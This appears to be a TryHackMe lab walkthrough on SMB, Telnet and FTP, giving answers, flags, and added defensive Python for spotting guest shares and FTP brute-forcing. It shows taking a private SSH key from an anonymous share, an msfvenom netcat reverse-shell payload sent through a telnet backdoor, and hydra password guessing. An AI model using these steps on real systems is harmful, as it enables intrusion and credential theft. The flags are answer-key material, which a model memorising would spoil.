Task 1 Get Connected
This task just explains how to connect to the TryHackMe VPN.
No Answer Needed
Task 2 Understanding SMB
What does SMB stand for?
Server Message Block
What type of protocol is SMB?
response-request
What do clients connect to servers using?
TCP/IP
What systems does Samba run on?
Unix
Task 3 Enumerating SMB
Conduct an nmap scan of your choosing. How many ports are open?
I ran nmap $ip -sV but it didn’t return much of anything.

It says the host may be down but since I knew it was turned on I needed to try something else. It recommended using the -Pn flag to avoid ping blocking.

3
What ports is SMB running on?
According to Varonis, ports 139 and 445 are the defaults for SMB.

139/445
Let’s get started with Enum4Linux, conduct a full basic enumeration. For starters, what is the workgroup name?
When I ran enum4linux $ip I was given way too much information from the tool. To filter it down to just what I was looking for, the workgroup name, I piped the enum4linux output to grep and searched for workgroup.
Running enum4linux $ip | grep workgroup returned the output below.

The first line of output gives us the answer. The name of the workgroup is WORKGROUP.
WORKGROUP
What comes up as the name of the machine?
I remember when getting the original output of enum4linux I saw some information about the machine.

POLOSMB
What operating system version is running?
Running the enum4linux tool again this time searching for the keyword ‘version’ returned the output below.

This told me the machine was running on OS version 6.1.
6.1
What share sticks out as something we might want to investigate?
To get the list of shares I ran enum4linux $ip -S. This gave me the below output.

Out of all the names listed here the one that stuck out the most was ‘profiles’. A share with a name like that is more likely to have personal user information that may be useful.
profiles
Task 4 Exploiting SMB
What would be the correct syntax to access an SMB share called “secret” as user “suit” on a machine with the IP 10.10.10.2 on the default port?
The TryHackMe lesson on this step gives the template for how to connect to an smb share using smbclient. The syntax is smbclient //[IP]/[SHARE] -U [username] -p [port].

smbclient //10.10.10.2/secret -U suit -p 445
Great! Now you’ve got a hang of the syntax, let’s have a go at trying to exploit this vulnerability. You have a list of users, the name of the share (smb) and a suspected vulnerability.
No answer needed
Let’s see if our interesting share has been configured to allow anonymous access, i.e. it doesn’t require authentication to view the files. We can do this easily by:
- using the username “Anonymous”
- connecting to the share we found during the enumeration stage
- and not supplying a password.
Does the share allow anonymous access? Y/N?
To access the profiles share on the server I used the command smbclient //$ip/profiles -U Anonymous. It then asked for a password. I just hit enter to give no password and it let me in. I was greeted with an smb prompt.

Y
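On the server side, the anonymous access just confirmed is a Samba configuration choice rather than a protocol feature. The following is an added example, not part of this walkthrough or the room, that scans an smb.conf for shares a guest session can reach; the sample configuration is constructed (the workgroup and host name are taken from the enumeration above, the "finance" share is invented as a locked-down counterexample).

```python
"""Flag Samba shares reachable by a guest (anonymous) session.

A share admits unauthenticated clients when it sets "guest ok = yes"
(synonym: "public"); "map to guest = Bad User" in [global] is what turns a
made-up username such as "Anonymous" with an empty password into that guest.
"""
import configparser

# Constructed smb.conf (not captured from the target) modelling the room's
# misconfiguration; "finance" is an invented, correctly restricted share.
SAMPLE_SMB_CONF = """\
[global]
workgroup = WORKGROUP
server string = POLOSMB
security = user
map to guest = Bad User

[profiles]
path = /srv/samba/profiles
public = yes

[finance]
path = /srv/samba/finance
guest ok = no
valid users = @finance
"""

TRUE_VALUES = {"yes", "true", "1"}


def anonymous_shares(conf_text):
    """Return {share_name: reason} for each share that allows guest access."""
    # smb.conf is INI-like: case-insensitive keys, '#' and ';' comments.
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    cp.read_string(conf_text)
    map_to_guest = "never"
    if cp.has_section("global"):
        map_to_guest = cp["global"].get("map to guest", "never").lower()
    findings = {}
    for share in cp.sections():
        if share == "global":
            continue
        sec = cp[share]
        # "public" is the documented synonym for "guest ok".
        guest = sec.get("guest ok", sec.get("public", "no")).strip().lower()
        if guest in TRUE_VALUES:
            findings[share] = f"guest ok = {guest}; map to guest = {map_to_guest}"
    return findings
```

Running anonymous_shares(SAMPLE_SMB_CONF) reports only profiles; a share that sets valid users and guest ok = no is not listed.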
Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?
The first thing I wanted to see was what all was in the current folder. I used the ls command and found a few interesting items. The one that caught my eye immediately was a file called Working From Home Information.txt.

I tried to output the text file to the shell but the smb console seems to not have cat or less capabilities.

Since it was obvious this shell was a little different than others I am familiar with, I had to check the help menu. I ran help and discovered this shell has the more command available.

I then ran more "Working From Home Information.txt" and discovered the following in the text file.

The output of this file told me a few things.
- The user’s name is apparently John Cactus
- The account was enabled with ssh
- The IT department email is it@polointernalcoms.uk
- The company has a department manager with the first name James.
John Cactus
What service has been configured to allow him to work from home?
ssh
Okay! Now we know this, what directory on the share should we look in?
Looking back at the contents of the directory, the .ssh directory seemed to be the most useful to getting ssh access.
.ssh
This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?
Inside the .ssh directory I found several keys.

The most useful one is the id_rsa because this is the private key for the connection.
id_rsa
Download this file to your local machine, and change the permissions to “600” using “chmod 600 [file]”.
First I used the get command I saw from the previous help menu to download the id_rsa file. I then used exit to leave the smbclient shell.

Next I listed the contents of the working directory to see if the download was successful.

The download was successful. Next, just to keep things clean, I created a new folder within the Documents directory to hold files for these challenges. Once the folders were created and I moved id_rsa to ~/Documents/Network_Services I continued on.

I then used the chmod 600 command to change permissions as instructed by the task.

Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server.
I still needed a username to login with, however. To find this I needed to go back to the smb shell. I looked around for a while in various folders with no luck until I decided to check the id_rsa.pub public key file that was in the same directory as the id_rsa key I’m using for the connection. Looking back I realized I probably should have checked here first.

According to this file there is a user with the name cactus
on the system. This is supported by the previous evidence of the user named John Cactus.
The last thing to do was to use the key with an ssh connection to get onto the machine. To do this I used the command ssh cactus@$ip -i ~/.ssh/id_rsa. After doing some testing I found it worked after moving the id_rsa key to the directory ~/.ssh in my Kali Linux distro. I also found I had to input the entire key file path to the ssh command to get it to work. There was probably a more elegant way to do this but this was the first way I was able to get it to work.

Once I was in the system all that was left was to find the smb.txt file and display its contents.

What is the smb.txt flag?
THM{smb_is_fun_eh?}
Task 5 Understanding Telnet
This task introduced Telnet, a method of remotely connecting to a computer across a network. It was the precursor to ssh, which replaced it because Telnet did not encrypt the messages sent over it. SSH (Secure Shell) solved this problem by encrypting the messages it sent and decrypting them when they arrived at the other side.
What is Telnet?
application protocol
What has slowly replaced Telnet?
ssh
How would you connect to a Telnet server with the IP 10.10.10.3 on port 23?
telnet 10.10.10.3 23
The lack of what, means that all Telnet communication is in plaintext?
encryption
Task 6 Enumerating Telnet
To start things off I ran an nmap scan on the target IP address. The original scan came back with no results so I widened the range of ports and scanned the whole range of 65,535 instead of the common 1,000.
On the second scan I found port 8012 open.

How many ports are open on the target machine?
1
What port is this?
8012
This port is unassigned, but still lists the protocol it’s using, what protocol is this?
In the image above it doesn’t show what service was running on the port but it did mention it was using tcp.
tcp
Now re-run the nmap scan, without the -p- tag, how many ports show up as open?
I know from doing the first scan you will get zero open ports if you don’t specify scanning the entire range.
0
Here, we see that by assigning telnet to a non-standard port, it is not part of the common ports list, or top 1000 ports, that nmap scans. It’s important to try every angle when enumerating, as the information you gather here will inform your exploitation stage.
No answer needed
Based on the title returned to us, what do we think this port could be used for?
The scan also returned other information about the port 8012.

It seemed to have information encoded in some way that removed white space. It appears to have the name “Skidy’s Backdoor”.
a backdoor
Who could it belong to? Gathering possible usernames is an important step in enumeration.
Skidy
Always keep a note of information you find during your enumeration stage, so you can refer back to it when you move on to try exploits.
No answer needed
Task 7 Exploiting Telnet
Okay, let’s try and connect to this telnet port! If you get stuck, have a look at the syntax for connecting outlined above.
To connect to the service I had to use the telnet command, feed in the IP address and specify the correct port to prevent telnet from using the default.

I was able to get in without providing a username or password.
No answer needed
Great! It’s an open telnet connection! What welcome message do we receive?
The above image indicates the welcome message upon first connection to the telnet server. This message was probably what I was seeing in the previous task after being decoded.
SKIDY'S BACKDOOR
Let’s try executing some commands, do we get a return on any input we enter into the telnet session? (Y/N)
The telnet shell didn’t seem to be very responsive and got stuck on me.
N
Hmm… that’s strange. Let’s check to see if what we’re typing is being executed as a system command.
No answer needed
I began a tcpdump listener as instructed by the task using sudo tcpdump ip proto \icmp -i tun0.
This starts a tcpdump listener, specifically listening for ICMP traffic, which pings operate on.
Now, use the command “ping [local THM ip] -c 1” through the telnet session to see if we’re able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)
I went back into the telnet session and ran the above command. To get the local THM ip I went to the top of the webpage in TryHackMe.


After running the command, I navigated back to the terminal tab containing the listener. It showed a connection using ICMP had occurred.

Y
Great! This means that we are able to execute system commands AND that we are able to reach our local machine. Now let’s have some fun!
No answer needed
We’re going to generate a reverse shell payload using msfvenom. This will generate and encode a netcat reverse shell for us.
What word does the generated payload start with?
I used the command msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R given from the task to create the payload needed to exploit the service.

mkfifo
Next I needed to create a listener using the same port as the payload. I used the command nc -lvp 4444 in a different terminal tab.

What would the command look like for the listening port we selected in our payload?
nc -lvp 4444
Great! Now that’s running, we need to copy and paste our msfvenom payload into the telnet session and run it as a command. Hopefully, this will give us a shell on the target machine!
No answer needed
Success! What are the contents of flag.txt?

First I opened a new telnet session. I had to restart the virtual machine because telnet was starting to get unresponsive. After running the payload I checked back on the listener tab.
The listener told me it caught something from the target IP. There wasn’t an obvious sign I had shell access. No arrows or prompts or anything. But I ran some commands as a test and it responded to me.
In the first directory I found a flag.txt file. Inside the file I found the flag.

THM{y0u_g0t_th3_t3ln3t_fl4g}
Task 8 Understanding FTP
FTP is a client-server protocol used to transfer files across a network. It uses port 21 by default and has two connection modes, active and passive. In active mode the client opens a port and the server connects to it; in passive mode the server opens a port and the client connects to it.
What communications model does FTP use?
client-server
What’s the standard FTP port?
21
How many modes of FTP connection are there?
2
Task 9 Enumerating FTP
Run an nmap scan of your choice.

Nmap only found one open port, an FTP service version vsftpd running on port 21.
How many ports are open on the target machine?
1
What port is ftp running on?
21
What variant of FTP is running on it?
vsftpd
Great, now we know what type of FTP server we’re dealing with we can check to see if we are able to login anonymously to the FTP server. We can do this by typing “ftp [IP]” into the console, and entering “anonymous”, and no password when prompted.

I was able to connect to the FTP server using the command ftp $ip, then feeding in the username anonymous and just hitting enter when it asked for a password.

I used the ls command in the FTP server to list the contents of the current directory. This told me there was a file called PUBLIC_NOTICE.txt.
What is the name of the file in the anonymous FTP directory?
PUBLIC_NOTICE.txt
What do we think a possible username could be?

I used the less command to display the output of the PUBLIC_NOTICE.txt to the shell. This gave me the above information. It mentions the name Mike which could be a username.
mike
Great! Now we’ve got details about the FTP server and, crucially, a possible username. Let’s see what we can do with that…
No answer needed
Task 10 Exploiting FTP
To exploit the server, the task wants me to use the password cracking tool, Hydra, to brute-force the password.
The task gives a basic overview of the syntax for the tool:
hydra -t 4 -l dale -P /usr/share/wordlists/rockyou.txt -vV 10.10.10.6 ftp
- -t sets the number of parallel connections
- -l sets the username the password belongs to
- -P sets the path to the wordlist that will be used to guess the password
- -vV sets very verbose mode which will show each combination attempted
- [IP] sets the IP address of the target
- ftp tells the tool which protocol to use.

I ran the command sudo hydra -t 4 -l mike -P $default_wordlist -vV $ip ftp and found the username mike used the password password. How original.
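From the server’s point of view a hydra run like this leaves a burst of "FAIL LOGIN" entries in vsftpd’s log for one client and one user within a few seconds, typically followed by an "OK LOGIN" when the wordlist hits. As an added example (not from the walkthrough or the room), this detection reads vsftpd.log-style lines and flags a client/user pair that fails repeatedly inside a short window; the log lines, timestamps and client addresses are constructed.

```python
"""Spot FTP password guessing in vsftpd.log-style entries.

Constructed sample: a short burst of failed logins for "mike" from one
client, a success right after, and an unrelated single failure for "dale".
"""
import re
from collections import defaultdict
from datetime import datetime

SAMPLE_LOG = """\
Tue Mar  5 14:02:10 2024 [pid 2101] CONNECT: Client "10.10.14.5"
Tue Mar  5 14:02:10 2024 [pid 2101] [mike] FAIL LOGIN: Client "10.10.14.5"
Tue Mar  5 14:02:10 2024 [pid 2102] [mike] FAIL LOGIN: Client "10.10.14.5"
Tue Mar  5 14:02:11 2024 [pid 2103] [mike] FAIL LOGIN: Client "10.10.14.5"
Tue Mar  5 14:02:11 2024 [pid 2104] [mike] FAIL LOGIN: Client "10.10.14.5"
Tue Mar  5 14:02:12 2024 [pid 2105] [mike] FAIL LOGIN: Client "10.10.14.5"
Tue Mar  5 14:02:12 2024 [pid 2106] [mike] OK LOGIN: Client "10.10.14.5"
Tue Mar  5 15:00:00 2024 [pid 2400] [dale] FAIL LOGIN: Client "10.10.14.9"
"""

# The user field is absent on CONNECT lines, hence optional in the pattern.
LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'(?:\[(?P<user>[^\]]+)\] )?(?P<event>OK LOGIN|FAIL LOGIN|CONNECT): '
    r'Client "(?P<client>[^"]+)"$')

def parse(log_text):
    """Yield (timestamp, user, event, client) for each well-formed line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(" ".join(m["ts"].split()), "%a %b %d %H:%M:%S %Y")
            yield ts, m["user"], m["event"], m["client"]

def detect_bruteforce(log_text, threshold=5, window_s=60):
    """Map (client, user) -> {'failures', 'succeeded_after'} for pairs with
    at least `threshold` failed logins inside a `window_s`-second window."""
    recent = defaultdict(list)  # (client, user) -> timestamps of recent fails
    alerts = {}
    for ts, user, event, client in parse(log_text):
        key = (client, user)
        if event == "FAIL LOGIN":
            window = [t for t in recent[key] if (ts - t).total_seconds() <= window_s]
            window.append(ts)
            recent[key] = window
            if len(window) >= threshold:
                alerts[key] = {"failures": len(window), "succeeded_after": False}
        elif event == "OK LOGIN" and key in alerts:
            # A success right after the burst means a guess very likely landed.
            alerts[key]["succeeded_after"] = True
    return alerts
```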
What is the password for the user “mike”?
password
Bingo! Now, let’s connect to the FTP server as this user using “ftp [IP]” and entering the credentials when prompted

I connected back to the FTP server but this time using the username and password I found. I was able to connect.
No answer needed
What is ftp.txt?

After logging in I listed the contents of the directory and found the file ftp.txt. Inside I found the flag text to answer the challenge.
THM{y0u_g0t_th3_ftp_fl4g}